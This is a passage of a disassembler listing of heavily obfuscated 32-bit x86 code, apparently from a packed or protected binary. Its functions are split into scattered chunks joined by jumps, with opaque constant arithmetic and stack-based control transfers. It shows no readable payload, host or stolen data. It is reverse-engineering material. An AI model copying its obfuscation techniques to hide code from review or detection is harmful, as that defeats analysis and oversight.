; FUNCTION CHUNK AT 00422628 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042323D SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00424B49 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426F59 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427149 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042978D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A8D7 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042BCB0 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042C2C8 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
mov eax, ds:dword_42C220
or eax, eax
jmp loc_42C2C8
sub_42982D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42983E proc near ; CODE XREF: sub_426562:loc_42656F�p
; FUNCTION CHUNK AT 0042190B SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00423A93 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00423C39 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424335 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00428BD9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428E2D SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042A2A7 SIZE 0000000A BYTES
call sub_42AA78
loc_429843: ; CODE XREF: sub_4248E7+6EB2�j
jmp loc_42A2A7
sub_42983E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_429848 proc near ; DATA XREF: sub_4268C1:loc_425588�o
mov eax, [ebp-8]
call sub_421047
loc_429850: ; CODE XREF: sub_425330:loc_42229F�j
add dword ptr [ebp-8], 4
jmp loc_426E3B
sub_429848 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425330
loc_429859: ; CODE XREF: sub_425330+4CFB�j
add [ebp+var_8], 2
jmp loc_425223
; END OF FUNCTION CHUNK FOR sub_425330
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429862 proc near ; CODE XREF: sub_423614-2086�p
; sub_423614+373D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00421D14 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00422787 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004229EA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00423895 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004245C6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425058 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042506D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00425BB9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426A34 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00427618 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042765D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00427A14 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042834A SIZE 00000031 BYTES
; FUNCTION CHUNK AT 00428FEC SIZE 00000005 BYTES
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
mov [ebp+var_4], eax
jmp loc_428FEC
sub_429862 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
jno loc_42B4BC
jmp loc_4252FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42972F
loc_42987B: ; CODE XREF: sub_42972F:loc_42B119�j
pop eax
xor eax, 0B5B15D25h
add eax, ebp
add eax, 5B678D75h
mov eax, [eax]
push eax
jmp loc_423536
; END OF FUNCTION CHUNK FOR sub_42972F
; ---------------------------------------------------------------------------
loc_429892: ; CODE XREF: _94j21ax3:0042675E�j
push 0B5341B5Bh
; =============== S U B R O U T I N E =======================================
sub_429897 proc near ; CODE XREF: sub_42426B-F51�p
mov [esp+0], ecx
pop ecx
inc dword ptr [ebp-4]
push offset loc_425203
loc_4298A3: ; CODE XREF: _94j21ax3:loc_423B8D�j
jmp nullsub_79
sub_429897 endp
; =============== S U B R O U T I N E =======================================
sub_4298A8 proc near ; DATA XREF: sub_42484C:loc_4290D5�o
mov eax, [ebp+8]
cmp dword ptr [eax-4], 4
call sub_42B3E4
sub_4298A8 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4258EB
loc_4298B4: ; CODE XREF: sub_4258EB:loc_425BBE�j
cmp ds:dword_42C48C, 0
jnz loc_422D2F
call sub_42AA07
mov edx, 0E5254649h
push offset loc_423AE3
jmp nullsub_80
; END OF FUNCTION CHUNK FOR sub_4258EB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_4298D5: ; CODE XREF: sub_42A0CC:loc_423F69�j
; sub_42A0CC-1516�j
mov eax, 62h
call sub_425A09
jmp loc_4271F8
; ---------------------------------------------------------------------------
loc_4298E4: ; CODE XREF: _94j21ax3:004234CF�j
; sub_42A0CC-66AF�j ...
jno loc_429171
push ebx
push 378468A5h
pop ebx
and ebx, 8B0DEA1Bh
jmp loc_42AAA9
; END OF FUNCTION CHUNK FOR sub_42A0CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F7F
loc_4298FC: ; CODE XREF: sub_423F7F+10�j
add ebx, 7FE978B4h
xchg ebx, [esp-4+arg_0]
jmp sub_422815
; END OF FUNCTION CHUNK FOR sub_423F7F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42972F
loc_42990A: ; CODE XREF: sub_42972F-4C4A�j
add edx, ebp
add edx, 0A28AE0A3h
mov edx, [edx]
shr edx, 3
mov ecx, ds:dword_429F74
jnb loc_426C07
or [ecx+edx], al
push 11292F5Ah
jmp loc_42B119
; END OF FUNCTION CHUNK FOR sub_42972F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_429930: ; CODE XREF: sub_423FCD:loc_42AF89�j
ja loc_423E8E
jmp loc_422AB3
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F55
loc_42993B: ; CODE XREF: sub_423F55:loc_42845E�j
sub ecx, 9ABEDFBAh
xor ecx, 0A487E332h
cmp ecx, 3260CB94h
jmp loc_42AC6B
; END OF FUNCTION CHUNK FOR sub_423F55
; ---------------------------------------------------------------------------
mov eax, esi
jmp sub_429C27
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4281A5
loc_429959: ; CODE XREF: sub_4281A5+E�j
jnz loc_42779C
jmp loc_42A9A5
; END OF FUNCTION CHUNK FOR sub_4281A5
; =============== S U B R O U T I N E =======================================
sub_429964 proc near ; CODE XREF: _94j21ax3:00425030�j
; sub_429CAE:loc_428F8C�p
mov [esp+0], ecx
pop ecx
push eax
call sub_423F43
retn
sub_429964 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428C49
loc_42996F: ; CODE XREF: sub_428C49+1C�j
jmp loc_428E1A
; END OF FUNCTION CHUNK FOR sub_428C49
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429974 proc near ; CODE XREF: _94j21ax3:0042728D�p
; sub_423324+5D11�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00421FDE SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00423C99 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00423E1B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424CED SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428717 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0042C349 SIZE 00000005 BYTES
push ebp
mov ebp, esp
pushf
jmp loc_421FDE
sub_429974 endp
; =============== S U B R O U T I N E =======================================
sub_42997D proc near ; DATA XREF: _94j21ax3:loc_424F79�o
add eax, 97910B65h
xchg eax, [esp+0]
jmp sub_42B079
sub_42997D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421CAA
loc_42998B: ; CODE XREF: sub_421CAA+867F�j
cmp esi, ebp
jmp loc_4225C2
; END OF FUNCTION CHUNK FOR sub_421CAA
; ---------------------------------------------------------------------------
loc_429992: ; DATA XREF: sub_42A389-597B�o
push 7777E9A1h
pop eax
add eax, 88CA56B7h
mov eax, [eax]
jmp loc_4282CF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4294B3
loc_4299A5: ; CODE XREF: sub_4294B3-C2D�j
jnb loc_427A9A
; END OF FUNCTION CHUNK FOR sub_4294B3
; START OF FUNCTION CHUNK FOR sub_422EB0
loc_4299AB: ; CODE XREF: sub_422EB0-15F7�j
; sub_4294B3-7BF1�j ...
jno loc_42B9C0
cmp dword ptr [ebp-4], 3
jnz loc_42BC7E
jmp loc_4255F6
; END OF FUNCTION CHUNK FOR sub_422EB0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4258EB
loc_4299C0: ; CODE XREF: sub_4258EB-1DEC�j
call sub_42AA07
mov edx, 0E5254649h
call sub_422048
mov ds:dword_42C48C, eax
loc_4299D4: ; CODE XREF: sub_423324:loc_423AED�j
; sub_4258EB-AC7�j ...
mov esp, ebp
call sub_427565
; END OF FUNCTION CHUNK FOR sub_4258EB
; START OF FUNCTION CHUNK FOR sub_424B8F
loc_4299DB: ; CODE XREF: sub_424B8F+16�j
jmp loc_4281D4
; END OF FUNCTION CHUNK FOR sub_424B8F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C057
loc_4299E0: ; CODE XREF: sub_42C057-7777�j
jmp loc_426EB3
; END OF FUNCTION CHUNK FOR sub_42C057
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424B01
loc_4299E5: ; CODE XREF: sub_424B01:loc_421B9E�j
push 0DBD3C4FFh
pop eax
sub eax, 0BFFEADAAh
add eax, 642AE8AFh
xor ebx, ebx
call sub_42284F
loc_4299FE: ; CODE XREF: _94j21ax3:00429542�j
js sub_427344
shl esi, 0Eh
jmp sub_423BF8
; END OF FUNCTION CHUNK FOR sub_424B01
; ---------------------------------------------------------------------------
dd 93E9C785h
db 0E2h, 2 dup(0FFh)
; =============== S U B R O U T I N E =======================================
sub_429A13 proc near ; CODE XREF: sub_429447+E�p
; _94j21ax3:004296D7�j
xchg esi, [esp+0]
pop esi
cmp edx, 7449E4Fh
mov edx, ebx
pop ecx
mov eax, offset sub_422E43
call sub_422E36
sub_429A13 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42B478
loc_429A2A: ; CODE XREF: sub_42B478+A�j
jmp loc_42AE26
; END OF FUNCTION CHUNK FOR sub_42B478
; ---------------------------------------------------------------------------
sbb edx, 0AB59AF8h
jmp sub_42328F
; ---------------------------------------------------------------------------
ja loc_421648
jmp sub_427D9D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_429A45: ; CODE XREF: sub_423324-7E5�j
sub ecx, 94DC3F0Fh
loc_429A4B: ; CODE XREF: sub_4294B3:loc_426DC0�j
jnb loc_421B13
; END OF FUNCTION CHUNK FOR sub_423324
; START OF FUNCTION CHUNK FOR sub_421F28
loc_429A51: ; CODE XREF: sub_421F28+928D�j
jmp loc_428BC9
; END OF FUNCTION CHUNK FOR sub_421F28
; ---------------------------------------------------------------------------
test ebx, 3466FF8Eh
jmp loc_42792B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42484C
loc_429A61: ; CODE XREF: sub_42484C+1E74�j
jnz loc_4249B4
jmp loc_423679
; END OF FUNCTION CHUNK FOR sub_42484C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4232F5
loc_429A6C: ; CODE XREF: sub_427AEB-6923�j
; sub_4232F5+1A�j
mov [edx-18h], eax
inc dword ptr [ebp-4]
mov eax, [ebp+8]
mov eax, [eax-18h]
and eax, 7
mov [ebp-0Ch], eax
jmp loc_42770C
; END OF FUNCTION CHUNK FOR sub_4232F5
; =============== S U B R O U T I N E =======================================
sub_429A83 proc near ; DATA XREF: sub_4236E2+1�o
var_C = dword ptr -0Ch
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042206B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423038 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00423EEE SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004253F7 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00425B0B SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042654C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426F6E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004282A3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00428862 SIZE 00000012 BYTES
push ecx
push esi
pushf
mov [esp+0], edi
mov esi, eax
pushf
pop eax
jmp loc_428862
sub_429A83 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_429A92: ; CODE XREF: _94j21ax3:0042A4AF�j
mov [ebp-4], eax
push 1Ch
lea eax, [ebp-34h]
call sub_429CCA
; START OF FUNCTION CHUNK FOR sub_423FCD
loc_429A9F: ; CODE XREF: sub_423FCD+25E1�j
cmp eax, 80000000h
jbe loc_423047
jmp loc_425228
; END OF FUNCTION CHUNK FOR sub_423FCD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_429AAF: ; CODE XREF: sub_423324:loc_42342C�j
lea eax, [ebp-14h]
mov dword ptr [eax], 737361h
push 0
lea eax, [ebp-20h]
jmp loc_427260
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429EBD
loc_429AC2: ; CODE XREF: sub_429EBD+F�j
rol edx, 0Fh
and edx, 33FA031Fh
add edx, 0CE888263h
xchg edx, [esp+4+var_4]
jmp loc_42C0A7
; END OF FUNCTION CHUNK FOR sub_429EBD
; ---------------------------------------------------------------------------
loc_429AD9: ; DATA XREF: sub_426BA2+1�o
mov ebp, esp
push ecx
cmp ds:dword_42C4A4, 0
jnz loc_42ACCA
jmp loc_42473D
; ---------------------------------------------------------------------------
ror ecx, 1Dh
sbb ebp, ecx
jmp sub_42ABB1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ABCE
loc_429AF8: ; CODE XREF: sub_42ABCE:loc_4269AC�j
mov [ebp+var_20], eax
mov eax, [ebp+var_20]
mov [ebp+var_28], eax
mov [ebp+var_14], 4
mov eax, [ebp+var_14]
mov [ebp+var_4], eax
mov eax, [ebp+var_14]
mov [ebp+var_C], eax
jmp loc_42C49C
; END OF FUNCTION CHUNK FOR sub_42ABCE
; =============== S U B R O U T I N E =======================================
sub_429B19 proc near ; DATA XREF: sub_42BEDC:loc_4286BC�o
mov eax, [ebp-4]
mov esp, ebp
pop ebp
retn
sub_429B19 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422FBC
loc_429B20: ; CODE XREF: sub_422FBC:loc_428DE7�j
rol eax, 0Ch
push eax
jmp nullsub_83
; END OF FUNCTION CHUNK FOR sub_422FBC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA5F
loc_429B29: ; CODE XREF: sub_4294B3:loc_424F8E�j
; sub_42AA5F-23B8�j ...
mov ecx, [ebp-20h]
loc_429B2C: ; CODE XREF: _94j21ax3:00427C84�j
and ecx, 7
mov eax, 1
shl eax, cl
mov edx, [ebp-20h]
shr edx, 3
mov ecx, ds:dword_429F74
movzx edx, byte ptr [ecx+edx]
jmp loc_4248C3
; END OF FUNCTION CHUNK FOR sub_42AA5F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421047
loc_429B4B: ; CODE XREF: sub_421047+6E62�j
call sub_42BFF0
push offset sub_428090
jmp nullsub_84
; END OF FUNCTION CHUNK FOR sub_421047
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429280
loc_429B5A: ; CODE XREF: sub_429280+17B9�j
pop edi
pop ebp
jmp loc_426485
; END OF FUNCTION CHUNK FOR sub_429280
; ---------------------------------------------------------------------------
push ebp
mov ebp, 0D33AB0C2h
jmp loc_42A224
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424C37
loc_429B6C: ; CODE XREF: sub_424C37-1ABE�j
; sub_424C37:loc_4286D1�j
cmp dword ptr [ebp-1C8h], 2B584245h
jnz loc_4258DB
jmp loc_4240E3
; END OF FUNCTION CHUNK FOR sub_424C37
; =============== S U B R O U T I N E =======================================
sub_429B81 proc near ; CODE XREF: _94j21ax3:00423D6A�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00427D73 SIZE 0000001A BYTES
mov [esp+0], eax
push 959D955h
add [esp+4+var_4], 0F6A626AFh
push 28h
push 0DA4FF4B8h
pop eax
rol eax, 0Dh
jmp loc_427D73
sub_429B81 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424A57
loc_429BA0: ; CODE XREF: sub_424A57+3814�j
and ebp, 0B6FE91DFh
loc_429BA6: ; CODE XREF: sub_424A57:loc_423EE3�j
call sub_42574E
push 0D7CFFD28h
pop edx
and edx, 0AE5626A8h
push offset sub_423D09
jmp nullsub_166
; END OF FUNCTION CHUNK FOR sub_424A57
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_8. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_429BC2 proc near ; CODE XREF: sub_422591+4�p
; sub_42982D-65D3�j ...
jns sub_426F9E
push ebp
mov ebp, esp
jmp loc_425551
sub_429BC2 endp
; ---------------------------------------------------------------------------
loc_429BD0: ; CODE XREF: _94j21ax3:00427FDE�j
call sub_429BE2
jmp loc_428ED5
; ---------------------------------------------------------------------------
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A5B9
loc_429BDD: ; CODE XREF: sub_42A5B9:loc_42A5C8�j
jmp nullsub_105
; END OF FUNCTION CHUNK FOR sub_42A5B9
; =============== S U B R O U T I N E =======================================
sub_429BE2 proc near ; CODE XREF: sub_421402+41�p
; sub_421402+6BCB�p ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00424392 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00427541 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042754D SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042B52A SIZE 0000001E BYTES
pushf
mov [esp+0], ebp
jnz loc_42754D
jmp loc_42B52A
sub_429BE2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42134B
loc_429BF1: ; CODE XREF: sub_42134B+1241�j
jnz loc_42911D
jmp loc_421A95
; END OF FUNCTION CHUNK FOR sub_42134B
; ---------------------------------------------------------------------------
push 8FD5BB5Bh
jmp sub_42BEFA
; ---------------------------------------------------------------------------
mov edx, 0D1108A58h
add edx, 70EB38B1h
jmp sub_4288EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422973
loc_429C16: ; CODE XREF: sub_422973+8CF4�j
and edx, 0D7D3A777h
or edx, 0DDF2D1DBh
call sub_42BE84
; END OF FUNCTION CHUNK FOR sub_422973
; =============== S U B R O U T I N E =======================================
sub_429C27 proc near ; CODE XREF: sub_425868-240E�p
; _94j21ax3:00429954�j
xchg ebx, [esp+0]
pop ebx
push ecx
mov esp, ebp
pop ebp
push 0AB220D5Bh
jmp loc_428547
sub_429C27 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425790
loc_429C39: ; CODE XREF: sub_425790-2B2A�j
ror edi, 5
cdq
jnb loc_423E82
jmp loc_42C006
; END OF FUNCTION CHUNK FOR sub_425790
; =============== S U B R O U T I N E =======================================
sub_429C48 proc near ; CODE XREF: _94j21ax3:0042397A�j
; sub_428EDA+9�p
; FUNCTION CHUNK AT 00421076 SIZE 00000005 BYTES
mov [esp+0], eax
pop eax
mov edx, [ebp+8]
or [edx-8], eax
jmp loc_421076
sub_429C48 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42484C
loc_429C57: ; CODE XREF: sub_42484C+2B23�j
; sub_42484C+45AA�j
cmp dword ptr [ebp-10h], 1
jmp loc_424BE4
; END OF FUNCTION CHUNK FOR sub_42484C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428BBD
loc_429C60: ; CODE XREF: sub_428BBD+289F�j
js loc_42A303
popf
add ebx, edi
loc_429C69: ; CODE XREF: sub_422436:loc_42C393�j
call sub_424D58
pushf
mov [esp+0], ecx
mov ecx, [esp+10h]
mov dword ptr [ecx], 10001h
jmp loc_424E64
; END OF FUNCTION CHUNK FOR sub_428BBD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424F07
loc_429C81: ; CODE XREF: sub_424F07:loc_42B4C7�j
mov eax, [ebp-20h]
mov byte ptr [eax], 0
inc dword ptr [ebp-1Ch]
jmp loc_422F19
; END OF FUNCTION CHUNK FOR sub_424F07
; ---------------------------------------------------------------------------
loc_429C8F: ; CODE XREF: _94j21ax3:loc_422C24�j
inc dword ptr [ebp-1Ch]
jmp loc_42250A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_429C97: ; CODE XREF: sub_423324+BC�j
; _94j21ax3:0042C107�j
inc dword ptr [ebp-18h]
dec dword ptr [ebp-24h]
jnz loc_422F46
jmp loc_423F37
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A9E7
loc_429CA9: ; CODE XREF: sub_42A9E7-29F7�j
jmp loc_42B9DC
; END OF FUNCTION CHUNK FOR sub_42A9E7
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_429CAE proc near ; CODE XREF: sub_423324-1808�j
; FUNCTION CHUNK AT 00421C20 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00422678 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00422F2E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423688 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00428F8C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042930D SIZE 00000005 BYTES
push ebp
mov ebp, esp
push ecx
mov esp, ebp
pop ebp
push 7966F0FCh
jmp loc_42930D
sub_429CAE endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BD03
loc_429CBF: ; CODE XREF: sub_42BD03-93E�j
jz loc_421D04
jmp loc_423385
; END OF FUNCTION CHUNK FOR sub_42BD03
; =============== S U B R O U T I N E =======================================
sub_429CCA proc near ; CODE XREF: sub_425324:loc_426475�j
; _94j21ax3:00429A9A�p
xchg eax, [esp+0]
pop eax
push eax
mov eax, [ebp-4]
call sub_424775
sub_429CCA endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42484C
loc_429CD7: ; CODE XREF: sub_42484C+32B2�j
jmp loc_428DF2
; END OF FUNCTION CHUNK FOR sub_42484C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424EE4
loc_429CDC: ; CODE XREF: sub_424EE4+B�j
jmp loc_4287A5
; END OF FUNCTION CHUNK FOR sub_424EE4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4220B7
loc_429CE1: ; CODE XREF: sub_4220B7:loc_429E29�j
jz loc_42526C
jmp loc_428BD4
; END OF FUNCTION CHUNK FOR sub_4220B7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4225A5
loc_429CEC: ; CODE XREF: sub_4225A5:loc_424061�j
sub edi, 50EF01E7h
or edi, 0C5FA4A98h
add edi, 847EC2Dh
mov [edi], eax
jmp loc_4266E6
; END OF FUNCTION CHUNK FOR sub_4225A5
; =============== S U B R O U T I N E =======================================
sub_429D05 proc near ; DATA XREF: _94j21ax3:00424429�o
ror eax, 0Eh
mov ds:dword_421998, eax
retn
sub_429D05 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A2B1
loc_429D0F: ; CODE XREF: sub_42A2B1+12�j
jmp loc_422292
; END OF FUNCTION CHUNK FOR sub_42A2B1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428B5E
loc_429D14: ; CODE XREF: sub_428B5E+8�j
rol eax, 0Eh
push eax
retn
; END OF FUNCTION CHUNK FOR sub_428B5E
; =============== S U B R O U T I N E =======================================
sub_429D19 proc near ; CODE XREF: _94j21ax3:loc_4288AA�p
; FUNCTION CHUNK AT 0042A467 SIZE 00000007 BYTES
push ebp
jmp loc_42A467
sub_429D19 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424839
loc_429D1F: ; CODE XREF: sub_424839+C�j
jnz loc_4245C0
jmp loc_42795F
; END OF FUNCTION CHUNK FOR sub_424839
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_23. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_429D2B: ; CODE XREF: _94j21ax3:0042A42B�j
jmp loc_42BA61
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_429D30: ; CODE XREF: sub_42C0BC-ADB1�j
jmp sub_425A09
; END OF FUNCTION CHUNK FOR sub_42C0BC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421F28
loc_429D35: ; CODE XREF: sub_421F28+6�j
; sub_42BA8A-600B�j
rol eax, 0Fh
call sub_4258CB
loc_429D3D: ; CODE XREF: sub_4210AA+5D69�j
jmp loc_421DB2
; END OF FUNCTION CHUNK FOR sub_421F28
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426B65
loc_429D42: ; CODE XREF: sub_426B65+1B�j
jmp sub_425395
; END OF FUNCTION CHUNK FOR sub_426B65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4250F7
loc_429D47: ; CODE XREF: sub_4250F7+4CEB�j
pop ebx
shl ebx, 1Dh
jmp loc_42174C
; END OF FUNCTION CHUNK FOR sub_4250F7
; ---------------------------------------------------------------------------
jns loc_4287D8
sub edi, ebp
jmp sub_4250F7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_429D5D: ; CODE XREF: sub_42284F:loc_428F2E�j
; sub_42284F+8F90�j
xor eax, 2A3F0280h
add ecx, eax
pop eax
add ecx, edx
loc_429D68: ; CODE XREF: _94j21ax3:loc_422E67�j
jmp loc_421105
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
and ebx, edx
jmp loc_429D97
; ---------------------------------------------------------------------------
xchg ebx, [eax]
jmp loc_425162
; ---------------------------------------------------------------------------
loc_429D7B: ; CODE XREF: _94j21ax3:00426D73�j
jz loc_42B264
ror ebp, 0Dh
xor ecx, 7B89193Ah
jp nullsub_167
mov edi, [ebx]
jmp loc_42B262
; ---------------------------------------------------------------------------
loc_429D97: ; CODE XREF: _94j21ax3:00429D6F�j
ror eax, 1Bh
; =============== S U B R O U T I N E =======================================
sub_429D9A proc near ; CODE XREF: sub_42C057-3DC9�p
arg_0 = dword ptr 4
mov [esp+0], ebx
pop ebx
add esi, 781DF580h
xchg esi, [esp-4+arg_0]
jmp sub_42446B
sub_429D9A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426744
loc_429DAC: ; CODE XREF: sub_426744:loc_42394B�j
xor eax, 750E76E0h
add eax, ebp
add eax, 4E6887D9h
mov eax, [eax]
pop ecx
call sub_427FF5
; END OF FUNCTION CHUNK FOR sub_426744
; START OF FUNCTION CHUNK FOR sub_4237DC
loc_429DC2: ; CODE XREF: sub_4237DC+16�j
jmp loc_42582F
; END OF FUNCTION CHUNK FOR sub_4237DC
; ---------------------------------------------------------------------------
loc_429DC7: ; CODE XREF: _94j21ax3:004215DF�j
jmp loc_429E1E
; =============== S U B R O U T I N E =======================================
sub_429DCC proc near ; CODE XREF: sub_42C5E8-B467�p
; sub_42B487+6�p ...
; FUNCTION CHUNK AT 00424FF3 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00428E5E SIZE 0000000D BYTES
jo sub_4272B2
call sub_424AED
loc_429DD7: ; CODE XREF: sub_4265C2+867�j
jmp loc_428E5E
sub_429DCC endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4250F7
loc_429DDC: ; CODE XREF: _94j21ax3:loc_42A215�j
; sub_4250F7+5F3A�j
jz loc_42174C
jmp loc_429D47
; END OF FUNCTION CHUNK FOR sub_4250F7
; ---------------------------------------------------------------------------
loc_429DE7: ; CODE XREF: _94j21ax3:0042AE11�j
mov ebp, edx
; =============== S U B R O U T I N E =======================================
sub_429DE9 proc near ; CODE XREF: sub_423324:loc_4297E0�p
mov [esp+0], ebx
pop ebx
add edi, ebp
push offset sub_4272D8
jmp nullsub_87
sub_429DE9 endp
; ---------------------------------------------------------------------------
loc_429DF9: ; CODE XREF: _94j21ax3:0042B574�j
pop edx
add edx, 0DFE7CD93h
sub edx, 400D750Ch
add edx, 0D13207BAh
add edx, ebp
jmp loc_424C1E
; ---------------------------------------------------------------------------
add esi, 8970C76Eh
jmp sub_4269A6
; ---------------------------------------------------------------------------
loc_429E1E: ; CODE XREF: _94j21ax3:loc_429DC7�j
jge loc_42C566
; START OF FUNCTION CHUNK FOR sub_423BF8
loc_429E24: ; CODE XREF: sub_423BF8+2CB0�j
